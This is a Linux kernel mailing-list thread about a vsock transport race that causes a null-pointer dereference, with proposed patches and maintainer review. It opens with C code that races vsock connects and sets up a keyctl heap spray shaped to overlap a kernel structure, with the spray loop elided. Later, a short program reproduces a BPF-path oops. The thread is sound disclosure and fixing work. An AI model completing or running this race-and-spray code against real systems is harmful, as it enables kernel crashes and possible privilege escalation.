#include <sys/mman.h>
#include <sys/times.h>
#include <sys/timerfd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <stddef.h>

#define FAIL_IF(x) if ((x)) { \
        perror(#x); \
        return -1; \
}
#define SPRAY_ERROR 0
#define SPRAY_RETRY 1
#define SPRAY_SUCCESS 2

#define LAST_RESERVED_PORT 1023

#define NS_PER_JIFFIE 1000000ull

int cid_port_num = LAST_RESERVED_PORT;

void *trigger_stack = NULL;
void *heap_spray_stack = NULL;
volatile int status_spray = SPRAY_ERROR;

struct virtio_vsock_sock {
	void *vsk;
	int tx_lock;
	int rx_lock;
	int tx_cnt;
	int peer_fwd_cnt;
	int peer_buf_alloc;
	int fwd_cnt;
	int last_fwd_cnt;
	int rx_bytes;
	int buf_alloc;
	char pad[4];
	char rx_queue[24];
	int msg_count;
};
_Static_assert(sizeof(struct virtio_vsock_sock) == 80, "virtio_vsock_sock size missmatch");

union key_payload {
        struct virtio_vsock_sock vvs;
        struct {
                char header[24];
                char data[];
        } key;
};

#define MAIN_CPU 0
#define HELPER_CPU 1

inline static int _pin_to_cpu(int id)
{
        cpu_set_t set;
        CPU_ZERO(&set);
        CPU_SET(id, &set);
        return sched_setaffinity(getpid(), sizeof(set), &set);
}

typedef int key_serial_t;

inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid)
{
	return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)
{
	return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5);
}

unsigned long long get_jiffies()
{
	return times(NULL) * 10;
}

int race_trigger(void *arg)
{
	struct sockaddr_vm connect_addr = {0};
	struct sockaddr_vm listen_addr = {0};
	pid_t conn_pid, listen_pid;

	int socket_a = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
	int socket_b = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

	cid_port_num++;

	connect_addr.svm_family = AF_VSOCK;
	connect_addr.svm_cid = VMADDR_CID_LOCAL;
	connect_addr.svm_port = cid_port_num;

	listen_addr.svm_family = AF_VSOCK;
	listen_addr.svm_cid = VMADDR_CID_LOCAL;
	listen_addr.svm_port = cid_port_num;
	bind(socket_a, (struct sockaddr *)&listen_addr, sizeof(listen_addr));

	listen(socket_a, 0);

	_pin_to_cpu(MAIN_CPU);

	conn_pid = fork();
	if (conn_pid == 0) {
		/*
		struct itimerspec it = {};
		int tfd;

		FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0);
		unsigned long tmp;
		it.it_value.tv_sec = 0;
		it.it_value.tv_nsec = 1 * NS_PER_JIFFIE;
		FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0);

		read(tfd, &tmp, sizeof(tmp));
		*/

		connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr));
	} else {
		/*
		struct itimerspec it = {};
		int tfd;

		FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0);
		unsigned long tmp;
		it.it_value.tv_sec = 0;
		it.it_value.tv_nsec = 1 * NS_PER_JIFFIE;
		FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0);

		read(tfd, &tmp, sizeof(tmp));
		*/

		kill(conn_pid, SIGKILL);
		wait(NULL);
	}

	connect_addr.svm_cid = 0;
	connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr));

	return 0;
}

int heap_spraying(void *arg)
{
	union key_payload payload = {};
	union key_payload readout = {};
	key_serial_t keys[256] = {};

	status_spray = SPRAY_ERROR;

	int race_trigger_pid = clone(race_trigger, trigger_stack, CLONE_VM | SIGCHLD, NULL);
	FAIL_IF(race_trigger_pid < 0);

	const size_t payload_size = sizeof(payload.vvs) - sizeof(payload.key.header);
	memset(&payload, '?', sizeof(payload));

	_pin_to_cpu(MAIN_CPU);

	unsigned long long begin = get_jiffies();
	do {
		// ...
	} while (get_jiffies() - begin < 25);

	status_spray = SPRAY_RETRY;

	return 0;
}

int main()
{
	srand(time(NULL));

	trigger_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
	FAIL_IF(trigger_stack == MAP_FAILED);
	trigger_stack += 0x8000;
	heap_spray_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
	FAIL_IF(heap_spray_stack == MAP_FAILED);
	heap_spray_stack += 0x8000;

	do {
		int spray_worker_pid = clone(heap_spraying, heap_spray_stack, CLONE_VM | SIGCHLD, NULL);
		FAIL_IF(spray_worker_pid < 0);
		FAIL_IF(waitpid(spray_worker_pid, NULL, 0) < 0);
	} while (status_spray == SPRAY_RETRY);

	return 0;
}
```

> 
> Would be nice to add a test in tools/testing/vsock/vsock_test.c
> 
> Thanks,
> Stefano
> 
> > > > >      vsock_assign_transport()
> > > > >        virtio_transport_release()
> > > > >          virtio_transport_close()
> > > > >            virtio_transport_shutdown()
> > > > >              virtio_transport_send_pkt_info()
> > > > >                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
> > > > >                  queue_work(vsock_loopback_work)
> > > > >        vsock_deassign_transport()
> > > > >          vsk->transport = NULL;
> > > > >                                                               vsock_loopback_work()
> > > > >                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
> > > > >                                                                   virtio_transport_recv_connected()
> > > > >                                                                     virtio_transport_reset()
> > > > >                                                                       virtio_transport_send_pkt_info()
> > > > >                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
> > > > >                                                                           queue_work(vsock_loopback_work)
> > > > > 
> > > > >                                                               vsock_loopback_work()
> > > > >                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
> > > > > 								   virtio_transport_recv_disconnecting()
> > > > > 								     virtio_transport_do_close()
> > > > > 								       vsock_stream_has_data()
> > > > > 								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref
> > > > > 
> > > > > To resolve this issue, add a check for vsk->transport, similar to
> > > > > functions like vsock_send_shutdown().
> > > > > 
> > > > > Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock")
> > > > > Signed-off-by: Hyunwoo Kim <v4bel@theori.io>
> > > > > Signed-off-by: Wongi Lee <qwerty@theori.io>
> > > > > ---
> > > > > net/vmw_vsock/af_vsock.c | 3 +++
> > > > > 1 file changed, 3 insertions(+)
> > > > > 
> > > > > diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
> > > > > index 5cf8109f672a..a0c008626798 100644
> > > > > --- a/net/vmw_vsock/af_vsock.c
> > > > > +++ b/net/vmw_vsock/af_vsock.c
> > > > > @@ -870,6 +870,9 @@ EXPORT_SYMBOL_GPL(vsock_create_connected);
> > > > > 
> > > > > s64 vsock_stream_has_data(struct vsock_sock *vsk)
> > > > > {
> > > > > +	if (!vsk->transport)
> > > > > +		return 0;
> > > > > +
> > > > 
> > > > I understand that this alleviates the problem, but IMO it is not the right
> > > > solution. We should understand why we're still processing the packet in the
> > > > context of this socket if it's no longer assigned to the right transport.
> > > 
> > > Got it. I agree with you.
> > > 
> > > > 
> > > > Maybe we can try to improve virtio_transport_recv_pkt() and check if the
> > > > vsk->transport is what we expect, I mean something like this (untested):
> > > > 
> > > > diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> > > > index 9acc13ab3f82..18b91149a62e 100644
> > > > --- a/net/vmw_vsock/virtio_transport_common.c
> > > > +++ b/net/vmw_vsock/virtio_transport_common.c
> > > > @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
> > > > 
> > > >        lock_sock(sk);
> > > > 
> > > > -       /* Check if sk has been closed before lock_sock */
> > > > -       if (sock_flag(sk, SOCK_DONE)) {
> > > > +       /* Check if sk has been closed or assigned to another transport before
> > > > +        * lock_sock
> > > > +        */
> > > > +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != t) {
> > > >                (void)virtio_transport_reset_no_sock(t, skb);
> > > >                release_sock(sk);
> > > >                sock_put(sk);
> > > > 
> > > > BTW I'm not sure it is the best solution, we have to check that we do not
> > > > introduce strange cases, but IMHO we have to solve the problem earlier in
> > > > virtio_transport_recv_pkt().
> > > 
> > > At least for vsock_loopback.c, this change doesn’t seem to introduce any
> > > particular issues.
> > 
> > But was it working for you? because the check was wrong, this one should
> > work, but still, I didn't have time to test it properly, I'll do later.
> > 
> > diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> > index 9acc13ab3f82..ddecf6e430d6 100644
> > --- a/net/vmw_vsock/virtio_transport_common.c
> > +++ b/net/vmw_vsock/virtio_transport_common.c
> > @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
> >        lock_sock(sk);
> > -       /* Check if sk has been closed before lock_sock */
> > -       if (sock_flag(sk, SOCK_DONE)) {
> > +       /* Check if sk has been closed or assigned to another transport before
> > +        * lock_sock
> > +        */
> > +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) {
> >                (void)virtio_transport_reset_no_sock(t, skb);
> >                release_sock(sk);
> >                sock_put(sk);
> > 
> > > 
> > > And separately, I think applying the vsock_stream_has_data patch would help
> > > prevent potential issues that could arise when vsock_stream_has_data is
> > > called somewhere.
> > 
> > Not sure, with that check, we wouldn't have seen this problem we had, so
> > either add an error, but mute it like this I don't think is a good idea,
> > also because the same function is used in a hot path, so an extra check
> > could affect performance (not much honestly in this case, but adding it
> > anywhere could).
> > 
> > Thanks,
> > Stefano
> > 
> > > 
> > > > 
> > > > Thanks,
> > > > Stefano
> > > > 
> > > > > 	return vsk->transport->stream_has_data(vsk);
> > > > > }
> > > > > EXPORT_SYMBOL_GPL(vsock_stream_has_data);
> > > > > --
> > > > > 2.34.1
> > > > > 
> > > > 
> > > 
>
Michal Luczaj Dec. 19, 2024, 12:25 a.m. UTC | #6
On 12/18/24 16:51, Hyunwoo Kim wrote:
> On Wed, Dec 18, 2024 at 04:31:03PM +0100, Stefano Garzarella wrote:
>> On Wed, Dec 18, 2024 at 03:40:40PM +0100, Stefano Garzarella wrote:
>>> On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote:
>>>> At least for vsock_loopback.c, this change doesn’t seem to introduce any
>>>> particular issues.
>>>
>>> But was it working for you? because the check was wrong, this one should
>>> work, but still, I didn't have time to test it properly, I'll do later.
>>>
>>> diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
>>> index 9acc13ab3f82..ddecf6e430d6 100644
>>> --- a/net/vmw_vsock/virtio_transport_common.c
>>> +++ b/net/vmw_vsock/virtio_transport_common.c
>>> @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
>>>        lock_sock(sk);
>>> -       /* Check if sk has been closed before lock_sock */
>>> -       if (sock_flag(sk, SOCK_DONE)) {
>>> +       /* Check if sk has been closed or assigned to another transport before
>>> +        * lock_sock
>>> +        */
>>> +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) {
>>>                (void)virtio_transport_reset_no_sock(t, skb);
>>>                release_sock(sk);
>>>                sock_put(sk);

Hi, I got curious about this race, my 2 cents:

Your patch seems to fix the reported issue, but there's also a variant (as
in: transport going null unexpectedly) involving BPF:

/*
$ gcc vsock-transport.c && sudo ./a.out

BUG: kernel NULL pointer dereference, address: 00000000000000a0
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 12faf8067 P4D 12faf8067 PUD 113670067 PMD 0
Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 15 UID: 0 PID: 1198 Comm: a.out Not tainted 6.13.0-rc2+
RIP: 0010:vsock_connectible_has_data+0x1f/0x40
Call Trace:
 vsock_bpf_recvmsg+0xca/0x5e0
 sock_recvmsg+0xb9/0xc0
 __sys_recvfrom+0xb3/0x130
 __x64_sys_recvfrom+0x20/0x30
 do_syscall_64+0x93/0x180
 entry_SYSCALL_64_after_hwframe+0x76/0x7e
*/

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/bpf.h>
#include <linux/vm_sockets.h>

static void die(const char *msg)
{
	perror(msg);
	exit(-1);
}

static int create_sockmap(void)
{
	union bpf_attr attr = {
		.map_type = BPF_MAP_TYPE_SOCKMAP,
		.key_size = sizeof(int),
		.value_size = sizeof(int),
		.max_entries = 1
	};
	int map;

	map = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
	if (map < 0)
		die("create_sockmap");

	return map;
}

static void map_update_elem(int fd, int key, int value)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = (uint64_t)&key,
		.value = (uint64_t)&value,
		.flags = BPF_ANY
	};

	if (syscall(SYS_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)))
		die("map_update_elem");
}

int main(void)
{
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
		.svm_port = VMADDR_PORT_ANY,
		.svm_cid = VMADDR_CID_LOCAL
	};
	socklen_t alen = sizeof(addr);
	int map, s;

	map = create_sockmap();

	s = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
	if (s < 0)
		die("socket");

	if (!connect(s, (struct sockaddr *)&addr, alen))
		die("connect #1");
	perror("ok, connect #1 failed; transport set");

	map_update_elem(map, 0, s);

	addr.svm_cid = 42;
	if (!connect(s, (struct sockaddr *)&addr, alen))
		die("connect #2");
	perror("ok, connect #2 failed; transport unset");

	recv(s, NULL, 0, 0);
	return 0;
}
Hyunwoo Kim Dec. 19, 2024, 1:37 a.m. UTC | #7
On Thu, Dec 19, 2024 at 01:25:34AM +0100, Michal Luczaj wrote:
> On 12/18/24 16:51, Hyunwoo Kim wrote:
> > On Wed, Dec 18, 2024 at 04:31:03PM +0100, Stefano Garzarella wrote:
> >> On Wed, Dec 18, 2024 at 03:40:40PM +0100, Stefano Garzarella wrote:
> >>> On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote:
> >>>> At least for vsock_loopback.c, this change doesn’t seem to introduce any
> >>>> particular issues.
> >>>
> >>> But was it working for you? because the check was wrong, this one should
> >>> work, but still, I didn't have time to test it properly, I'll do later.
> >>>
> >>> diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> >>> index 9acc13ab3f82..ddecf6e430d6 100644
> >>> --- a/net/vmw_vsock/virtio_transport_common.c
> >>> +++ b/net/vmw_vsock/virtio_transport_common.c
> >>> @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
> >>>        lock_sock(sk);
> >>> -       /* Check if sk has been closed before lock_sock */
> >>> -       if (sock_flag(sk, SOCK_DONE)) {
> >>> +       /* Check if sk has been closed or assigned to another transport before
> >>> +        * lock_sock
> >>> +        */
> >>> +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) {
> >>>                (void)virtio_transport_reset_no_sock(t, skb);
> >>>                release_sock(sk);
> >>>                sock_put(sk);
> 
> Hi, I got curious about this race, my 2 cents:
> 
> Your patch seems to fix the reported issue, but there's also a variant (as
> in: transport going null unexpectedly) involving BPF:

Yes. It seems that calling connect() twice causes the transport to become 
NULL, leading to null-ptr-deref in any flow that tries to access that 
transport.

And that null-ptr-deref occurs because, unlike __vsock_stream_recvmsg, 
vsock_bpf_recvmsg does not check vsock->transport:
```
int
__vsock_connectible_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
                            int flags)
{
	...

        lock_sock(sk);

        transport = vsk->transport;

        if (!transport || sk->sk_state != TCP_ESTABLISHED) {
                /* Recvmsg is supposed to return 0 if a peer performs an
                 * orderly shutdown. Differentiate between that case and when a
                 * peer has not connected or a local shutdown occurred with the
                 * SOCK_DONE flag.
                 */
                if (sock_flag(sk, SOCK_DONE))
                        err = 0;
                else
                        err = -ENOTCONN;

                goto out;
        }
```

> 
> /*
> $ gcc vsock-transport.c && sudo ./a.out
> 
> BUG: kernel NULL pointer dereference, address: 00000000000000a0
> #PF: supervisor read access in kernel mode
> #PF: error_code(0x0000) - not-present page
> PGD 12faf8067 P4D 12faf8067 PUD 113670067 PMD 0
> Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI
> CPU: 15 UID: 0 PID: 1198 Comm: a.out Not tainted 6.13.0-rc2+
> RIP: 0010:vsock_connectible_has_data+0x1f/0x40
> Call Trace:
>  vsock_bpf_recvmsg+0xca/0x5e0
>  sock_recvmsg+0xb9/0xc0
>  __sys_recvfrom+0xb3/0x130
>  __x64_sys_recvfrom+0x20/0x30
>  do_syscall_64+0x93/0x180
>  entry_SYSCALL_64_after_hwframe+0x76/0x7e
> */
> 
> #include <stdio.h>
> #include <stdint.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <sys/socket.h>
> #include <sys/syscall.h>
> #include <linux/bpf.h>
> #include <linux/vm_sockets.h>
> 
> static void die(const char *msg)
> {
> 	perror(msg);
> 	exit(-1);
> }
> 
> static int create_sockmap(void)
> {
> 	union bpf_attr attr = {
> 		.map_type = BPF_MAP_TYPE_SOCKMAP,
> 		.key_size = sizeof(int),
> 		.value_size = sizeof(int),
> 		.max_entries = 1
> 	};
> 	int map;
> 
> 	map = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
> 	if (map < 0)
> 		die("create_sockmap");
> 
> 	return map;
> }
> 
> static void map_update_elem(int fd, int key, int value)
> {
> 	union bpf_attr attr = {
> 		.map_fd = fd,
> 		.key = (uint64_t)&key,
> 		.value = (uint64_t)&value,
> 		.flags = BPF_ANY
> 	};
> 
> 	if (syscall(SYS_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)))
> 		die("map_update_elem");
> }
> 
> int main(void)
> {
> 	struct sockaddr_vm addr = {
> 		.svm_family = AF_VSOCK,
> 		.svm_port = VMADDR_PORT_ANY,
> 		.svm_cid = VMADDR_CID_LOCAL
> 	};
> 	socklen_t alen = sizeof(addr);
> 	int map, s;
> 
> 	map = create_sockmap();
> 
> 	s = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
> 	if (s < 0)
> 		die("socket");
> 
> 	if (!connect(s, (struct sockaddr *)&addr, alen))
> 		die("connect #1");
> 	perror("ok, connect #1 failed; transport set");
> 
> 	map_update_elem(map, 0, s);
> 
> 	addr.svm_cid = 42;
> 	if (!connect(s, (struct sockaddr *)&addr, alen))
> 		die("connect #2");
> 	perror("ok, connect #2 failed; transport unset");
> 
> 	recv(s, NULL, 0, 0);
> 	return 0;
> }
>
Stefano Garzarella Dec. 19, 2024, 8:19 a.m. UTC | #8
On Wed, Dec 18, 2024 at 08:37:38PM -0500, Hyunwoo Kim wrote:
>On Thu, Dec 19, 2024 at 01:25:34AM +0100, Michal Luczaj wrote:
>> On 12/18/24 16:51, Hyunwoo Kim wrote:
>> > On Wed, Dec 18, 2024 at 04:31:03PM +0100, Stefano Garzarella wrote:
>> >> On Wed, Dec 18, 2024 at 03:40:40PM +0100, Stefano Garzarella wrote:
>> >>> On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote:
>> >>>> At least for vsock_loopback.c, this change doesn’t seem to introduce any
>> >>>> particular issues.
>> >>>
>> >>> But was it working for you? because the check was wrong, this one should
>> >>> work, but still, I didn't have time to test it properly, I'll do later.
>> >>>
>> >>> diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
>> >>> index 9acc13ab3f82..ddecf6e430d6 100644
>> >>> --- a/net/vmw_vsock/virtio_transport_common.c
>> >>> +++ b/net/vmw_vsock/virtio_transport_common.c
>> >>> @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
>> >>>        lock_sock(sk);
>> >>> -       /* Check if sk has been closed before lock_sock */
>> >>> -       if (sock_flag(sk, SOCK_DONE)) {
>> >>> +       /* Check if sk has been closed or assigned to another transport before
>> >>> +        * lock_sock
>> >>> +        */
>> >>> +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) {
>> >>>                (void)virtio_transport_reset_no_sock(t, skb);
>> >>>                release_sock(sk);
>> >>>                sock_put(sk);
>>
>> Hi, I got curious about this race, my 2 cents:
>>
>> Your patch seems to fix the reported issue, but there's also a variant (as
>> in: transport going null unexpectedly) involving BPF:

I think it is a different problem, to be solved in vsock_bpf.c

With something like this (untested):

diff --git a/net/vmw_vsock/vsock_bpf.c b/net/vmw_vsock/vsock_bpf.c
index 4aa6e74ec295..8c2322dc2af7 100644
--- a/net/vmw_vsock/vsock_bpf.c
+++ b/net/vmw_vsock/vsock_bpf.c
@@ -25,10 +25,8 @@ static struct proto vsock_bpf_prot;
  static bool vsock_has_data(struct sock *sk, struct sk_psock *psock)
  {
         struct vsock_sock *vsk = vsock_sk(sk);
-       s64 ret;

-       ret = vsock_connectible_has_data(vsk);
-       if (ret > 0)
+       if (vsk->transport && vsock_connectible_has_data(vsk) > 0)
                 return true;

         return vsock_sk_has_data(sk, psock);

Note: we should check better this, because sometime we call it without
lock_sock, also thi

>
>Yes. It seems that calling connect() twice causes the transport to become
>NULL, leading to null-ptr-deref in any flow that tries to access that
>transport.

We already expect vsk->transport to be null in several parts, but in 
some we assume it is called when this is valid. So we should check 
better what we do when we deassign a transport.

>
>And that null-ptr-deref occurs because, unlike __vsock_stream_recvmsg,
>vsock_bpf_recvmsg does not check vsock->transport:

Right.

So, thanks for the report, I'll try to see if I can make a patch with 
everything before tomorrow, because then I'm gone for 2 weeks.

Otherwise we'll see as soon as I get back or if you have time in the 
meantime, any solution is welcome.

I think the best thing though is to better understand how to handle 
deassign, rather than checking everywhere that it's not null, also 
because in some cases (like the one in virtio-vsock), it's also 
important that the transport is the same.

Thanks,
Stefano

>```
>int
>__vsock_connectible_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
>                            int flags)
>{
>	...
>
>        lock_sock(sk);
>
>        transport = vsk->transport;
>
>        if (!transport || sk->sk_state != TCP_ESTABLISHED) {
>                /* Recvmsg is supposed to return 0 if a peer performs an
>                 * orderly shutdown. Differentiate between that case and when a
>                 * peer has not connected or a local shutdown occurred with the
>                 * SOCK_DONE flag.
>                 */
>                if (sock_flag(sk, SOCK_DONE))
>                        err = 0;
>                else
>                        err = -ENOTCONN;
>
>                goto out;
>        }
>```
>
>>
>> /*
>> $ gcc vsock-transport.c && sudo ./a.out
>>
>> BUG: kernel NULL pointer dereference, address: 00000000000000a0
>> #PF: supervisor read access in kernel mode
>> #PF: error_code(0x0000) - not-present page
>> PGD 12faf8067 P4D 12faf8067 PUD 113670067 PMD 0
>> Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI
>> CPU: 15 UID: 0 PID: 1198 Comm: a.out Not tainted 6.13.0-rc2+
>> RIP: 0010:vsock_connectible_has_data+0x1f/0x40
>> Call Trace:
>>  vsock_bpf_recvmsg+0xca/0x5e0
>>  sock_recvmsg+0xb9/0xc0
>>  __sys_recvfrom+0xb3/0x130
>>  __x64_sys_recvfrom+0x20/0x30
>>  do_syscall_64+0x93/0x180
>>  entry_SYSCALL_64_after_hwframe+0x76/0x7e
>> */
>>
>> #include <stdio.h>
>> #include <stdint.h>
>> #include <stdlib.h>
>> #include <unistd.h>
>> #include <sys/socket.h>
>> #include <sys/syscall.h>
>> #include <linux/bpf.h>
>> #include <linux/vm_sockets.h>
>>
>> static void die(const char *msg)
>> {
>> 	perror(msg);
>> 	exit(-1);
>> }
>>
>> static int create_sockmap(void)
>> {
>> 	union bpf_attr attr = {
>> 		.map_type = BPF_MAP_TYPE_SOCKMAP,
>> 		.key_size = sizeof(int),
>> 		.value_size = sizeof(int),
>> 		.max_entries = 1
>> 	};
>> 	int map;
>>
>> 	map = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
>> 	if (map < 0)
>> 		die("create_sockmap");
>>
>> 	return map;
>> }
>>
>> static void map_update_elem(int fd, int key, int value)
>> {
>> 	union bpf_attr attr = {
>> 		.map_fd = fd,
>> 		.key = (uint64_t)&key,
>> 		.value = (uint64_t)&value,
>> 		.flags = BPF_ANY
>> 	};
>>
>> 	if (syscall(SYS_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)))
>> 		die("map_update_elem");
>> }
>>
>> int main(void)
>> {
>> 	struct sockaddr_vm addr = {
>> 		.svm_family = AF_VSOCK,
>> 		.svm_port = VMADDR_PORT_ANY,
>> 		.svm_cid = VMADDR_CID_LOCAL
>> 	};
>> 	socklen_t alen = sizeof(addr);
>> 	int map, s;
>>
>> 	map = create_sockmap();
>>
>> 	s = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
>> 	if (s < 0)
>> 		die("socket");
>>
>> 	if (!connect(s, (struct sockaddr *)&addr, alen))
>> 		die("connect #1");
>> 	perror("ok, connect #1 failed; transport set");
>>
>> 	map_update_elem(map, 0, s);
>>
>> 	addr.svm_cid = 42;
>> 	if (!connect(s, (struct sockaddr *)&addr, alen))
>> 		die("connect #2");
>> 	perror("ok, connect #2 failed; transport unset");
>>
>> 	recv(s, NULL, 0, 0);
>> 	return 0;
>> }
>>
>
Michal Luczaj Dec. 19, 2024, 2:36 p.m. UTC | #9
On 12/19/24 09:19, Stefano Garzarella wrote:
> ...
> I think the best thing though is to better understand how to handle 
> deassign, rather than checking everywhere that it's not null, also 
> because in some cases (like the one in virtio-vsock), it's also 
> important that the transport is the same.

My vote would be to apply your virtio_transport_recv_pkt() patch *and* make
it impossible-by-design to switch ->transport from non-NULL to NULL in
vsock_assign_transport().

If I'm not mistaken, that would require rewriting vsock_assign_transport()
so that a new transport is assigned only once fully initialized, otherwise
keep the old one (still unhurt and functional) and return error. Because
failing connect() should not change anything under the hood, right?
Stefano Garzarella Dec. 19, 2024, 2:48 p.m. UTC | #10
On Thu, 19 Dec 2024 at 15:36, Michal Luczaj <mhal@rbox.co> wrote:
>
> On 12/19/24 09:19, Stefano Garzarella wrote:
> > ...
> > I think the best thing though is to better understand how to handle
> > deassign, rather than checking everywhere that it's not null, also
> > because in some cases (like the one in virtio-vsock), it's also
> > important that the transport is the same.
>
> My vote would be to apply your virtio_transport_recv_pkt() patch *and* make
> it impossible-by-design to switch ->transport from non-NULL to NULL in
> vsock_assign_transport().

I don't know if that's enough, in this case the problem is that some
response packets are intended for a socket, where the transport has
changed. So whether it's null or assigned but different, it's still a
problem we have to handle.

So making it impossible for the transport to be null, but allowing it
to be different (we can't prevent it from changing), doesn't solve the
problem for us, it only shifts it.

>
> If I'm not mistaken, that would require rewriting vsock_assign_transport()
> so that a new transport is assigned only once fully initialized, otherwise
> keep the old one (still unhurt and functional) and return error. Because
> failing connect() should not change anything under the hood, right?
>

Nope, connect should be able to change the transport.

Because a user can do an initial connect() that requires a specific
transport, this one fails maybe because there's no peer with that cid.
Then the user can redo the connect() to a different cid that requires
a different transport.

Stefano
Michal Luczaj Dec. 19, 2024, 3:04 p.m. UTC | #11
On 12/19/24 15:48, Stefano Garzarella wrote:
> On Thu, 19 Dec 2024 at 15:36, Michal Luczaj <mhal@rbox.co> wrote:
>>
>> On 12/19/24 09:19, Stefano Garzarella wrote:
>>> ...
>>> I think the best thing though is to better understand how to handle
>>> deassign, rather than checking everywhere that it's not null, also
>>> because in some cases (like the one in virtio-vsock), it's also
>>> important that the transport is the same.
>>
>> My vote would be to apply your virtio_transport_recv_pkt() patch *and* make
>> it impossible-by-design to switch ->transport from non-NULL to NULL in
>> vsock_assign_transport().
> 
> I don't know if that's enough, in this case the problem is that some
> response packets are intended for a socket, where the transport has
> changed. So whether it's null or assigned but different, it's still a
> problem we have to handle.
> 
> So making it impossible for the transport to be null, but allowing it
> to be different (we can't prevent it from changing), doesn't solve the
> problem for us, it only shifts it.

Got it. I assumed this issue would be solved by `vsk->transport !=
&t->transport` in the critical place(s).

(Note that BPF doesn't care if transport has changed; BPF just expects to
have _a_ transport.)

>> If I'm not mistaken, that would require rewriting vsock_assign_transport()
>> so that a new transport is assigned only once fully initialized, otherwise
>> keep the old one (still unhurt and functional) and return error. Because
>> failing connect() should not change anything under the hood, right?
>>
> 
> Nope, connect should be able to change the transport.
> 
> Because a user can do an initial connect() that requires a specific
> transport, this one fails maybe because there's no peer with that cid.
> Then the user can redo the connect() to a different cid that requires
> a different transport.

But the initial connect() failing does not change anything under the hood
(transport should/could stay NULL). Then a successful re-connect assigns
the transport (NULL -> non-NULL). And it's all good because all I wanted to
avoid (because of BPF) was non-NULL -> NULL. Anyway, that's my possibly
shallow understanding :)
Stefano Garzarella Dec. 19, 2024, 3:12 p.m. UTC | #12
On Thu, 19 Dec 2024 at 16:05, Michal Luczaj <mhal@rbox.co> wrote:
>
> On 12/19/24 15:48, Stefano Garzarella wrote:
> > On Thu, 19 Dec 2024 at 15:36, Michal Luczaj <mhal@rbox.co> wrote:
> >>
> >> On 12/19/24 09:19, Stefano Garzarella wrote:
> >>> ...
> >>> I think the best thing though is to better understand how to handle
> >>> deassign, rather than checking everywhere that it's not null, also
> >>> because in some cases (like the one in virtio-vsock), it's also
> >>> important that the transport is the same.
> >>
> >> My vote would be to apply your virtio_transport_recv_pkt() patch *and* make
> >> it impossible-by-design to switch ->transport from non-NULL to NULL in
> >> vsock_assign_transport().
> >
> > I don't know if that's enough, in this case the problem is that some
> > response packets are intended for a socket, where the transport has
> > changed. So whether it's null or assigned but different, it's still a
> > problem we have to handle.
> >
> > So making it impossible for the transport to be null, but allowing it
> > to be different (we can't prevent it from changing), doesn't solve the
